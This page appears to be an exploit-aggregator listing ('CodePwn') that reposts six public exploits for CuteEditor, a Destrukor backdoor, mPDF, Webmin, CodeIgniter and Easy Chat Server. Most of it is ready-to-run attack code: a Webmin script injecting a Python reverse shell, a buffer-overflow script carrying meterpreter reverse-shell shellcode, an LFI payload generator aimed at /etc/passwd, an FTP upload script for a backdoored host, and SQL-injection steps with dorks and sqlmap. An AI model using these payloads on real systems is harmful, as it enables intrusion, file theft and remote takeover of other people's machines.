Latest exploits :: CodePwn

<pre><code># Exploit Title: CuteEditor for PHP 6.6 - Directory Traversal # Google Dork: N/A # Date: November 17th, 2021 # Exploit Author: Stefan Hesselman # Vendor Homepage: http://phphtmledit.com/ # Software Link: http://phphtmledit.com/download/phphtmledit.zip # Version: 6.6 # Tested on: Windows Server 2019 # CVE : N/A There is a path traversal vulnerability in the browse template feature in CuteEditor for PHP via the "rename file" option. An attacker with access to CuteEditor functions can write HTML templates to any directory inside the web root. File: /phphtmledit/cuteeditor_files/Dialogs/Include_Security.php, Lines: 109-121 Vulnerable code: [SNIP] function ServerMapPath($input_path,$absolute_path,$virtual_path) { if($absolute_path!="") { return $absolute_path.str_ireplace($virtual_path,"",$input_path); } else { if(strtoupper(substr(PHP_OS, 0, 3) === 'WIN')) { if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['SCRIPT_FILENAME'])) { $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF']))); } if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['PATH_TRANSLATED'])) { $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr(str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF']))); } return $_SERVER["DOCUMENT_ROOT"].$input_path; } else { return ucfirst($_SERVER["DOCUMENT_ROOT"]).$input_path; } } } [SNIP] ServerMapPath() takes 3 arguments: $input_path, $absolute_path, and $virtual_path and is used, among others, in the browse_template.php file. File:/phphtmledit/cuteeditor_files/Dialogs/browse_Template.php, Lines: 47-56 Vulnerable function (renamefile, line 57): [SNIP] switch ($action) { [SNIP] case "renamefile": rename(ServerMapPath($_GET["filename"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath),ServerMapPath($_GET["newname"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath)); print "<script language=\"javascript\">parent.row_click('".$_GET["newname"]."');</script>"; break; [SNIP] $input_path is $_GET["filename"] and is under control of the attacker. If an attacker uploads and renames the HTML template to '..\..\..\poc.html', it becomes: C:\Inetpub\wwwroot\..\..\..\poc.html Final result: writes poc.html to the webroot. STEPS: 1. Create a poc.html file (XSS PoC will do). <HTML> <title>Path Traversal PoC</title> <BODY> <h1>PoC</h1> <script>alert('directory traversal');</script> </BODY> </HTML> 2. Upload poc.html via the "Insert Templates" page using the "Upload files" option. 3. Select poc.html and select "Rename File". 4. Click on the pencil icon to the right of the poc.html file. 5. Rename file to "..\..\..\poc.html". 6. Press OK. poc.html is written three directories up. This may require more or less dot dot slash (..\ or ../) depending on the size of your directory tree. Adjust slashes as needed. </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/c790749f851d48e66e7d59cc2e451956.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Destrukor.20 Vulnerability: Authentication Bypass Description: The malware listens on TCP port 6969. However, after sending a specific cmd "rozmiar" the backdoor returns "moznasciagac" in Polish "you can download" and port 21 opens. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands, this can result in remote code execution. Family: Destrukor Type: PE32 MD5: c790749f851d48e66e7d59cc2e451956 Dropped files: sys32.exe Vuln ID: MVID-2022-0626 Disclosure: 07/30/2022 Exploit/PoC: C:\>nc64.exe 192.168.18.125 6969 rozmiar moznasciagac C:\>nc64.exe 192.168.18.125 21 220 ICS FTP Server ready. USER malvuln 331 Password required for malvuln. PASS malvuln 230 User malvuln logged in. SYST 215 UNIX Type: L8 Internet Component Suite CDUP \ 250 CWD command successful. "C:/" is current directory. MKD HATE 257 'C:\HATE': directory created. PASV 227 Entering Passive Mode (192,168,18,125,232,131). STOR DOOM.exe 150 Opening data connection for DOOM.exe. 226 File received ok from socket import * MALWARE_HOST="192.168.18.125" PORT=59523 DOOM="DOOM.exe" def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) f = open(DOOM, "rb") EXE = f.read() s.send(EXE) while EXE: s.send(EXE) EXE=f.read() s.close() print("By Malvuln"); if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code># Exploit Title: mPDF 7.0 - Local File Inclusion # Google Dork: N/A # Date: 2022-07-23 # Exploit Author: Musyoka Ian # Vendor Homepage: https://mpdf.github.io/ # Software Link: https://mpdf.github.io/ # Version: CuteNews # Tested on: Ubuntu 20.04, mPDF 7.0.x # CVE: N/A #!/usr/bin/env python3 from urllib.parse import quote from cmd import Cmd from base64 import b64encode class Terminal(Cmd): prompt = "\nFile >> " def default(self, args): payload_gen(args) def banner(): banner = """ _____ _____ ______ ______ ___ __ __ _ _ _ | __ \| __ \| ____| |____ / _ \ \ \ / / | | (_) | _ __ ___ | |__) | | | | |__ / / | | | \ V / _____ ___ __ | | ___ _| |_ | '_ ` _ \| ___/| | | | __| / /| | | | > < / _ \ \/ / '_ \| |/ _ \| | __| | | | | | | | | |__| | | / / | |_| | / . \ | __/> <| |_) | | (_) | | |_ |_| |_| |_|_| |_____/|_| /_/ (_)___(_)_/ \_\ \___/_/\_\ .__/|_|\___/|_|\__| | | |_| """ print(banner) def payload_gen(fname): payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />' encoded_payload = quote(payload) print("[+] Replace the content with the payload below") print(f"Url encoded payload:\n{encoded_payload}\n") base64enc = b64encode(encoded_payload.encode()) print(f"Base64 encoded payload:\n{base64enc.decode()}\n") if __name__ == ("__main__"): banner() print("Enter Filename eg. /etc/passwd") terminal= Terminal() terminal.cmdloop() </code></pre>

<pre><code># Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-07-25 # Exploit Author: Emir Polat # Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165 # Vendor Homepage: https://www.webmin.com/ # Software Link: https://www.webmin.com/download.html # Version: < 1.997 # Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64) # CVE: CVE-2022-36446 import argparse import requests from bs4 import BeautifulSoup def login(args): global session global sysUser session = requests.Session() loginUrl = f"{args.target}:10000/session_login.cgi" infoUrl = f"{args.target}:10000/sysinfo.cgi" username = args.username password = args.password data = {'user': username, 'pass': password} login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'}) sysInfo = session.post(infoUrl, verify=False, cookies={'sid' : session.cookies['sid']}) bs = BeautifulSoup(sysInfo.text, 'html.parser') sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs] if sysUser: return True else: return False def exploit(args): payload = f""" 1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'); """ updateUrl = f"{args.target}:10000/package-updates" exploitUrl = f"{args.target}:10000/package-updates/update.cgi" exploitData = {'mode' : 'new', 'search' : 'ssh', 'redir' : '', 'redirdesc' : '', 'u' : payload, 'confirm' : 'Install+Now'} if login(args): print("[+] Successfully Logged In !") print(f"[+] Session Cookie => sid={session.cookies['sid']}") print(f"[+] User Found => {sysUser[0]}") res = session.get(updateUrl) bs = BeautifulSoup(res.text, 'html.parser') updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs] if updateAccess[0] == "package-updates": print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>") print(f"[+] Exploit starting ... ") print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}") session.headers.update({'Referer' : f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'}) session.post(exploitUrl, data=exploitData) else: print(f"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <<Software Package Updates>>") else: print("[-] Login Failed !") if __name__ == '__main__': parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)") parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True) parser.add_argument('-u', '--username', help='Username For Login', required=True) parser.add_argument('-p', '--password', help='Password For Login', required=True) parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True) parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True) parser.add_argument("-s", '--ssl', help="Use if server support SSL.", required=False) args = parser.parse_args() exploit(args) </code></pre>

<pre><code>[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+]Exploit Title : CodeIgniter CMS Version 4.2.0 Sql Injection Vulnerability [+] [+]Exploit Author : E1.Coders [+] [+]Vendor Homepage : https://www.codeigniter.com/ [+] [+]Google Dork ONE : searchResult/?title= [+] [+]Google Dork Two : Job/searchResult/?title= [+] [+]Date : 15 / 05 / 2022 [+] [+]Tested On : windows + linux [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~>DESCRITION <~ ~ ~ [+] [+] CodeIgniter CMS suffers from a remote SQL injection vulnerability. [+] "codeigniter vulnerability ::$DATA view source code" [+] Note that this find contains information about the site. [+] CodeIgniter CMS SQL injection vulnerabilities were found and confirmed in the software as an anonymous user. [+] A successful attack could allow an unknown attacker to access information such as username and password hashes stored in the database. [+] The following URLs and parameters have been confirmed to suffer from SQL injection. [+] [+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~> Location <~ ~ ~ [+] SQL ERROR Location [+] http://www.site.com/Job/searchResult/?title=[SQL] [+] [+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~ ~~ ~> DEMO <~ ~ ~ [+] [+] [+] ERROR : https://[removed].com/Job/searchResult/?title=123%27 [+] [+] ERROR : https://[removed].com/Job/city/%D8%A7%D8%B3%D8%AA%D8%AE%D8%AF%D8%A7%D9%85-%D9%85%D8%B4%D9%87%D8%AF' (OR= or ==) [+] [+] ERROR : https://[removed].ir/?per_page=400%2 [+] [+] ERROR : https://[removed].ir/Job/search/NULL/%D8%A2%D8%A8%D8%A7%D8%AF%D8%A7%D9%86'/NULL/NULL/0 [+] [+] ERROR : https://[removed].com/login/ (username = ' Password = ') [+] [+] ERROR : https://[removed].com/search.php?search=1' [+] [+] ERROR : https://[removed].com/news.php?p=7251' [+] [+] ERROR : https://[removed].com/employe/show.php?cvid=14088' [+] [+] ERROR : https://[removed].com/states/%D8%AA%D9%87%D8%B1%D8%A7%D9%86' [+] [+] ERROR : https://[removed].com/fa/index.asp?p=search&search=1 [+] [+] ERROR : https://[removed].com/fa/FormView/1026' [+] [+] ERROR : https://[removed].com/fa/formview/1030' [+] And Google More . . . \ . [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Methode Attack : [+] [+] Step 1 : Enter the URL of the page that has the problem of sql injection attacks [+] [+] Step 2 : Add a variable " OR ' to the end of the URL "request" [+] To display the PHP error related to not controlling the functions that cause the attacker to attack ' [+] [+] Step 3 : Use sqlmap: python sqlmap.py -u "https://[removed].com/Job/searchResult/?title=123" [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] About CMS : [+] [+] Codeigniter is an open source web software framework used to build dynamic websites. [+] This framework, which is written in PHP language, [+] accelerates the development of software by coding from the beginning. This acceleration is done by the framework's libraries, [+] many of which make common tasks simple. The first public release of CodeIgniter was on February 28, 2006 [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Explanation of vulnerability : [+] [+] The remote attacker can test the SQL Inject attack by injecting a 'variable' and after displaying the PHP error related to not controlling the functions that cause the SQL Inject attack [+] And the attacker can execute attacks with SQL Inject commands or execute attacks with ready tools such as Squat Map. [+] [+] All different parts of the site have this security problem [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Solution : [+] [+] [+] Use parameter input validation to be modified to prevent attacks [+] "codeigniter vulnerability ::$DATA view source code" [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] </code></pre>

<pre><code># Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH) # Exploit Author: r00tpgp @ http://www.r00tpgp.com # Usage: python easychat-exploit.py <victim-ip> <port> # Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990 # CVE: CVE-2004-2466 # Installer: http://www.echatserver.com/ # Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000) #!/usr/bin/python import sys, socket, time host = sys.argv[1] # Recieve IP from user port = int(sys.argv[2]) # Recieve Port from user #msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20" buf = "" buf += "\xbe\x4e\xdd\xd4\x27\xd9\xe9\xd9\x74\x24\xf4\x5b\x29" buf += "\xc9\xb1\x54\x31\x73\x13\x83\xc3\x04\x03\x73\x41\x3f" buf += "\x21\xdb\xb5\x3d\xca\x24\x45\x22\x42\xc1\x74\x62\x30" buf += "\x81\x26\x52\x32\xc7\xca\x19\x16\xfc\x59\x6f\xbf\xf3" buf += "\xea\xda\x99\x3a\xeb\x77\xd9\x5d\x6f\x8a\x0e\xbe\x4e" buf += "\x45\x43\xbf\x97\xb8\xae\xed\x40\xb6\x1d\x02\xe5\x82" buf += "\x9d\xa9\xb5\x03\xa6\x4e\x0d\x25\x87\xc0\x06\x7c\x07" buf += "\xe2\xcb\xf4\x0e\xfc\x08\x30\xd8\x77\xfa\xce\xdb\x51" buf += "\x33\x2e\x77\x9c\xfc\xdd\x89\xd8\x3a\x3e\xfc\x10\x39" buf += "\xc3\x07\xe7\x40\x1f\x8d\xfc\xe2\xd4\x35\xd9\x13\x38" buf += "\xa3\xaa\x1f\xf5\xa7\xf5\x03\x08\x6b\x8e\x3f\x81\x8a" buf += "\x41\xb6\xd1\xa8\x45\x93\x82\xd1\xdc\x79\x64\xed\x3f" buf += "\x22\xd9\x4b\x4b\xce\x0e\xe6\x16\x86\xe3\xcb\xa8\x56" buf += "\x6c\x5b\xda\x64\x33\xf7\x74\xc4\xbc\xd1\x83\x2b\x97" buf += "\xa6\x1c\xd2\x18\xd7\x35\x10\x4c\x87\x2d\xb1\xed\x4c" buf += "\xae\x3e\x38\xf8\xa4\xa8\x03\x55\xb8\x8a\xec\xa4\xb9" buf += "\xcd\x2a\x21\x5f\x81\xe2\x62\xf0\x61\x53\xc3\xa0\x09" buf += "\xb9\xcc\x9f\x29\xc2\x06\x88\xc3\x2d\xff\xe0\x7b\xd7" buf += "\x5a\x7a\x1a\x18\x71\x06\x1c\x92\x70\xf6\xd2\x53\xf0" buf += "\xe4\x02\x02\xfa\xf4\xd2\xaf\xfa\x9e\xd6\x79\xac\x36" buf += "\xd4\x5c\x9a\x98\x27\x8b\x98\xdf\xd7\x4a\xa9\x94\xe1" buf += "\xd8\x95\xc2\x0d\x0d\x16\x13\x5b\x47\x16\x7b\x3b\x33" buf += "\x45\x9e\x44\xee\xf9\x33\xd0\x11\xa8\xe0\x73\x7a\x56" buf += "\xde\xb3\x25\xa9\x35\xc0\x22\x55\xcb\xe4\x8a\x3e\x33" buf += "\xa8\x2a\xbf\x59\x28\x7b\xd7\x96\x07\x74\x17\x56\x82" buf += "\xdd\x3f\xdd\x42\xaf\xde\xe2\x4f\x71\x7f\xe2\x63\xaa" buf += "\x96\x6d\x84\x4d\x97\x8f\xb9\x9b\xae\xe5\xfa\x1f\x95" buf += "\xf6\xb1\x02\xbc\x9c\xb9\x11\xbe\xb4" junk = "A"*217 nseh = "\xeb\x06\x90\x90" # short jump 6 bytes seh = "\x86\xae\x01\x10" # pop pop ret 1001AE86 SSLEAY32.DLL nops = "\x90"*16 header = ( "GET /chat.ghp?username=" + junk + nseh + seh + nops + buf + "&password=&room=1&sex=1 HTTP/1.1\r\n" "User-Agent: Mozilla/4.0\r\n" "Host: 192.168.1.136:80\r\n" "Accept-Language: en-us\r\n" "Accept-Encoding: gzip, deflate\r\n" "Referer: http://192.168.1.136\r\n" "Connection: Keep-Alive\r\n\r\n" ) client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket client.connect((host, port)) # Connect to user supplied port and IP address client.send(header) # Send the user command with a variable length name client.close() # Close the Connection </code></pre>